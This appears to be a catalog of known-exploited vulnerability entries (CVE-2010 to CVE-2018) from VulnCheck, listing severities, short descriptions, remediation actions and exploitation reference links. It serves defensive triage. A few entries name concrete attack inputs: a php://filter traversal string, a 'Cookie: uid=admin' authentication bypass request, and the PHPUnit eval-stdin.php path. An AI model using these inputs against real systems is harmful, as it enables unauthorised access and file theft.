CVE-2018-20463 [HIGH] jsmol2wp_project jsmol2wp Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
jsmol2wp_project jsmol2wp Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.
Affected: jsmol2wp_project jsmol2wp
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continue
VulnCheck
Fortinet FortiOS SSL VPN Path Traversal Vulnerability
vulncheck·2018·CVSS 9.1
CVE-2018-13379 [CRITICAL] CWE-22 Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Fortinet FortiOS SSL VPN Path Traversal Vulnerability
Fortinet FortiOS SSL VPN web portal contains a path traversal vulnerability that may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.
Affected: Fortinet FortiOS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities; https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf; https://www.dragos.com/wp-content/uploads/The-ICS-Threat-Landscape.pdf; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-13379; https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF;
VulnCheck
tbkvision tbk-dvr4216_firmware Improper Authentication
vulncheck·2018·CVSS 9.8
CVE-2018-9995 [CRITICAL] tbkvision tbk-dvr4216_firmware Improper Authentication
tbkvision tbk-dvr4216_firmware Improper Authentication
TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
Affected: tbkvision tbk-dvr4216_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.csk.gov.in/alerts/STOP_ransomware.html; https://for
VulnCheck
Dasan GPON Routers Authentication Bypass Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-10561; https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.virusbulletin.com/virusbulletin/2019/12/vb2019-paper-absolutely-routed-why-routers-are-new-bul
VulnCheck
Drupal Core Remote Code Execution Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-7600 [CRITICAL] CWE-20 Drupal Core Remote Code Execution Vulnerability
Drupal Core Remote Code Execution Vulnerability
Drupal Core contains a remote code execution vulnerability that could allow an attacker to exploit multiple attack vectors on a Drupal site, resulting in complete site compromise.
Affected: Drupal Drupal Core
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/; https://cert.gov.ua/article/2725; https://blog.talosintelligence.com/2019/04/seaturtle.html; https://www.alibabacloud.com/blog/8220-mining-group-now-uses-rootkit-to-hide-its-miners_595055; https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-in-jul
VulnCheck
Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
vulncheck·2018·CVSS 7.5
CVE-2018-0296 [HIGH] CWE-20 Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
Cisco Adaptive Security Appliance (ASA) contains an improper input validation vulnerability with HTTP URLs. Exploitation could allow an attacker to cause a denial-of-service (DoS) condition or information disclosure.
Affected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blog.talosintelligence.com/2019/04/seaturtle.html; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2018-0296; https://dashboard.shadowserver.org/statistics/honeypot/vulnerabil
VulnCheck
ThinkPHP "noneCms" Remote Code Execution Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-20062 [CRITICAL] CWE-20 ThinkPHP "noneCms" Remote Code Execution Vulnerability
ThinkPHP "noneCms" Remote Code Execution Vulnerability
ThinkPHP "noneCms" contains an unspecified vulnerability that allows for remote code execution through crafted use of the filter parameter.
Affected: ThinkPHP noneCms
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/; https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/; https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/; https://securityintelligence.com/posts/top-10-cybersecurity-vulnerabilities-2020/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/defaul
VulnCheck
Elastic Kibana External Control of File Name or Path
vulncheck·2018·CVSS 9.8
CVE-2018-17246 [CRITICAL] Elastic Kibana External Control of File Name or Path
Elastic Kibana External Control of File Name or Path
Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
Affected: Elastic Kibana
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2018-17246; https://dashboard.shadowserver.org/statistics/honeypot/
VulnCheck
Jenkins github Exposure of Sensitive Information to an Unauthorized Actor
vulncheck·2018·CVSS 8.8
CVE-2018-1000600 [HIGH] Jenkins github Exposure of Sensitive Information to an Unauthorized Actor
Jenkins github Exposure of Sensitive Information to an Unauthorized Actor
A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
Affected: Jenkins github
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/t
VulnCheck
fullworksplugins stop_user_enumeration Exposure of Sensitive Information to an Unauthorized Actor
vulncheck·2017·CVSS 5.3
CVE-2017-1000226 [MEDIUM] fullworksplugins stop_user_enumeration Exposure of Sensitive Information to an Unauthorized Actor
fullworksplugins stop_user_enumeration Exposure of Sensitive Information to an Unauthorized Actor
Stop User Enumeration 1.3.8 allows user enumeration via the REST API
Affected: fullworksplugins stop_user_enumeration
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
Zyxel P660HN-T1A Routers Command Injection Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-18368 [CRITICAL] CWE-78 Zyxel P660HN-T1A Routers Command Injection Vulnerability
Zyxel P660HN-T1A Routers Command Injection Vulnerability
Zyxel P660HN-T1A routers contain a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user and exploited via the remote_host parameter of the ViewLog.asp page.
Affected: Zyxel P660HN-T1A Routers
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; https://cujo.com/blog/iot-botnet-report-2021-malware-and-vulnerabilities-targeted/; https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-
VulnCheck
Atlassian oauth Server-Side Request Forgery (SSRF)
vulncheck·2017·CVSS 6.1
CVE-2017-9506 [MEDIUM] Atlassian oauth Server-Side Request Forgery (SSRF)
Atlassian oauth Server-Side Request Forgery (SSRF)
The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
Affected: Atlassian oauth
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-20
VulnCheck
manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2017·CVSS 7.5
CVE-2017-11512 [HIGH] manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
Affected: manageengine servicedesk
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.checkpoint.com/security/december-2021s-most-wanted-malware-trickbot-emotet-and-the-log4j-plague/; https://blog.checkpoint.com/security/april-2022s-most-wanted-malware-a-shake-up-in-the-inde
VulnCheck
Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
vulncheck·2017·CVSS 7.5
CVE-2017-10271 [HIGH] Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/; https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/; https://isc.sans.edu/diary/Criminals+Dont+Read+Instructions+or+Use+Strong+Passwords/23850; https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html; https://www.lacework.com/blog/elf-of-the-month-new-lucky-ransomware-sample
VulnCheck
Red Hat JBoss Application Server Remote Code Execution Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-12149 [CRITICAL] CWE-502 Red Hat JBoss Application Server Remote Code Execution Vulnerability
Red Hat JBoss Application Server Remote Code Execution Vulnerability
The JBoss Application Server, shipped with Red Hat Enterprise Application Platform 5.2, allows an attacker to execute arbitrary code via crafted serialized data.
Affected: Red Hat JBoss Application Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2017-12149; https://www.lacework.com/blog/elf-of-the-month-new-lucky-ransomware-sample/; https://cyware.com/news/satan-ransomware-an-overview-of-the-ransomwares-variants-and-exploits-35acecd3; https://www.alibabacloud.com/blog/8220-mining-group-now-uses-rootkit-to-hide-its-miners_595055; https://web.archive.org/web/20220227045141/https://risksen
VulnCheck
dedecms dedecms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2017·CVSS 9.8
CVE-2017-17731 [CRITICAL] dedecms dedecms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
dedecms dedecms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
Affected: dedecms dedecms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://app.crowdsec.net/cti/cve-explorer/CVE-2017-17731
VulnCheck
PHPUnit Command Injection Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-9841 [CRITICAL] CWE-94 PHPUnit Command Injection Vulnerability
PHPUnit Command Injection Vulnerability
PHPUnit allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
Affected: PHPUnit PHPUnit
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/; https://www.bleepingcomputer.com/news/security/new-cryptomining-malw
VulnCheck
dnnsoftware DotNetNuke (DNN) Server-Side Request Forgery (SSRF)
vulncheck·2017·CVSS 7.5
CVE-2017-0929 [HIGH] dnnsoftware DotNetNuke (DNN) Server-Side Request Forgery (SSRF)
dnnsoftware DotNetNuke (DNN) Server-Side Request Forgery (SSRF)
DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
Affected: dnnsoftware DotNetNuke (DNN)
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://www.greynoise.io/blog/new-ssrf
VulnCheck
manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2017·CVSS 7.5
CVE-2017-11511 [HIGH] manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
manageengine servicedesk Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the filepath parameter for the download-file URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
Affected: manageengine servicedesk
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/a
VulnCheck
NETGEAR readynas_surveillance Improper Input Validation
vulncheck·2016·CVSS 9.8
CVE-2016-5674 [CRITICAL] NETGEAR readynas_surveillance Improper Input Validation
NETGEAR readynas_surveillance Improper Input Validation
__debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.
Affected: NETGEAR readynas_surveillance
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-23&host_type=src&vulnerability=cve-2016-5674; https://dashboard.shadowserver.org/statistics/honeypot
VulnCheck
bonitasoft bonita_bpm_portal Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2015·CVSS 5.0
CVE-2015-3897 [MEDIUM] bonitasoft bonita_bpm_portal Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
bonitasoft bonita_bpm_portal Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory traversal vulnerability in Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
Affected: bonitasoft bonita_bpm_portal
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/contin
VulnCheck
helpdesk_pro_project helpdesk_pro Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2015·CVSS 7.5
CVE-2015-4074 [HIGH] helpdesk_pro_project helpdesk_pro Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
helpdesk_pro_project helpdesk_pro Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
Affected: helpdesk_pro_project helpdesk_pro
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-s
VulnCheck
umbraco umbraco Server-Side Request Forgery (SSRF)
vulncheck·2015·CVSS 8.2
CVE-2015-8813 [HIGH] umbraco umbraco Server-Side Request Forgery (SSRF)
umbraco umbraco Server-Side Request Forgery (SSRF)
The Page_Load function in Umbraco.Web/umbraco.presentation/umbraco/dashboard/FeedProxy.aspx.cs in Umbraco before 7.4.0 allows remote attackers to conduct server-side request forgery (SSRF) attacks via the url parameter.
Affected: umbraco umbraco
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
Android Nexus 5 Qualcomm Components Elevation of Privilege Vulnerability
vulncheck·2014·CVSS 7.8
CVE-2014-9792 [HIGH] Android Nexus 5 Qualcomm Components Elevation of Privilege Vulnerability
Android Nexus 5 Qualcomm Components Elevation of Privilege Vulnerability
arch/arm/mach-msm/ipc_router.c in the Qualcomm components in Android before 2016-07-05 on Nexus 5 devices uses an incorrect integer data type, which allows attackers to gain privileges via a crafted application, aka Android internal bug 28769399 and Qualcomm internal bug CR550606.
Affected: Google Android
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/conti
VulnCheck
seagate blackarmor_nas_220_firmware Improper Input Validation
vulncheck·2014·CVSS 9.8
CVE-2014-3206 [CRITICAL] seagate blackarmor_nas_220_firmware Improper Input Validation
seagate blackarmor_nas_220_firmware Improper Input Validation
Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
Affected: seagate blackarmor_nas_220_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://twitter.com/ESETresearch/status/1440052837820428298?s=20; https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx; https://cujo.com/blog/iot-botnet-report-2021-malware-and-vulnerabilities-targeted/; https://cujo.com/blog/the-2022-2023-iot-botnet-report-
VulnCheck
marketo_ma_project marketo_ma Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2014·CVSS 3.5
CVE-2014-8379 [LOW] marketo_ma_project marketo_ma Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
marketo_ma_project marketo_ma Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Multiple cross-site scripting (XSS) vulnerabilities in the Marketo MA module before 7.x-1.5 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via vectors related to field titles to the (1) Webform or (2) User sub-modules.
Affected: marketo_ma_project marketo_ma
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; htt
VulnCheck
Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
vulncheck·2014·CVSS 9.8
CVE-2014-6287 [CRITICAL] CWE-94 Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (HFS or HttpFileServer) allows remote attackers to execute arbitrary programs.
Affected: Rejetto HTTP File Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.trendmicro.com/en_us/research/19/f/blacksquid-slithers-into-servers-and-drives-with-8-notorious-exploits-to-drop-xmrig-miner.html; https://s.tencent.com/research/report/737.html; https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities-exploits-and-malware-driving-attack-campaigns-in-november-2019; https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/; https://research.checkpoint.com/2020/rudeminer-b
VulnCheck
ZTE F460 and F660 Cable Modems web_shell_cmd.gch Security Bypass
vulncheck·2014·CVSS 10.0
CVE-2014-2321 [CRITICAL] ZTE F460 and F660 Cable Modems web_shell_cmd.gch Security Bypass
ZTE F460 and F660 Cable Modems web_shell_cmd.gch Security Bypass
web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
Affected: ZTE f460
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/; https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; https://cybersecurity
VulnCheck
Siemens simatic_s7_cpu_1200_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2014·CVSS 4.3
CVE-2014-2908 [MEDIUM] Siemens simatic_s7_cpu_1200_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Siemens simatic_s7_cpu_1200_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Affected: Siemens simatic_s7_cpu_1200_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intellige
VulnCheck
Apache Struts Improper Input Validation Vulnerability
vulncheck·2013·CVSS 9.8
CVE-2013-2251 [CRITICAL] CWE-20 Apache Struts Improper Input Validation Vulnerability
Apache Struts Improper Input Validation Vulnerability
Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions.
Affected: Apache Struts
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://www.labs.greynoise.io/grimoire/2025-12-26-coldfusion/
Remediation Due: 2022-04-15
VulnCheck
D-Link dcs-3411_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2013·CVSS 9.8
CVE-2013-1599 [CRITICAL] D-Link dcs-3411_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
D-Link dcs-3411_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A Command Injection vulnerability exists in the /var/www/cgi-bin/rtpd.cgi script in D-Link IP Cameras DCS-3411/3430 firmware 1.02, DCS-5605/5635 1.01, DCS-1100L/1130L 1.04, DCS-1100/1130 1.03, DCS-1100/1130 1.04_US, DCS-2102/2121 1.05_RU, DCS-3410 1.02, DCS-5230 1.02, DCS-5230L 1.02, DCS-6410 1.00, DCS-7410 1.00, DCS-7510 1.00, and WCS-1100 1.02, which could let a remote malicious user execute arbitrary commands through the camera’s web interface.
Affected: D-Link dcs-3411_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit
VulnCheck
Apache Solr Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2013·CVSS 4.3
CVE-2013-6397 [MEDIUM] Apache Solr Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Apache Solr Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory traversal vulnerability in SolrResourceLoader in Apache Solr before 4.6 allows remote attackers to read arbitrary files via a .. (dot dot) or full pathname in the tr parameter to solr/select/, when the response writer (wt parameter) is set to XSLT. NOTE: this can be leveraged using a separate XXE (XML eXternal Entity) vulnerability to allow access to files across restricted network boundaries.
Affected: Apache Solr
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024;
VulnCheck
PHP-CGI Query String Parameter Vulnerability
vulncheck·2012·CVSS 9.8
CVE-2012-1823 [CRITICAL] CWE-20 PHP-CGI Query String Parameter Vulnerability
PHP-CGI Query String Parameter Vulnerability
sapi/cgi/cgi_main.c in PHP, when configured as a CGI script, does not properly handle query strings, which allows remote attackers to execute arbitrary code.
Affected: PHP PHP
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.fortiguard.com/encyclopedia/ips/31752; https://www.bleepingcomputer.com/news/security/linux-and-windows-servers-targeted-with-rubyminer-malware/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/2024_Trustwave_Public_Sector_Threat_Landscape.pdf; https://censys.com/cve-2024-4577/; https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/2024_Trustwave_Professional_Services_Sector_Threa
VulnCheck
gecad axigen_free_mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2012·CVSS 6.4
CVE-2012-4940 [MEDIUM] gecad axigen_free_mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
gecad axigen_free_mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
Affected: gecad axigen_free_mail_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://w
VulnCheck
Adobe ColdFusion Directory Traversal Vulnerability
vulncheck·2010·CVSS 9.8
CVE-2010-2861 [CRITICAL] CWE-22 Adobe ColdFusion Directory Traversal Vulnerability
Adobe ColdFusion Directory Traversal Vulnerability
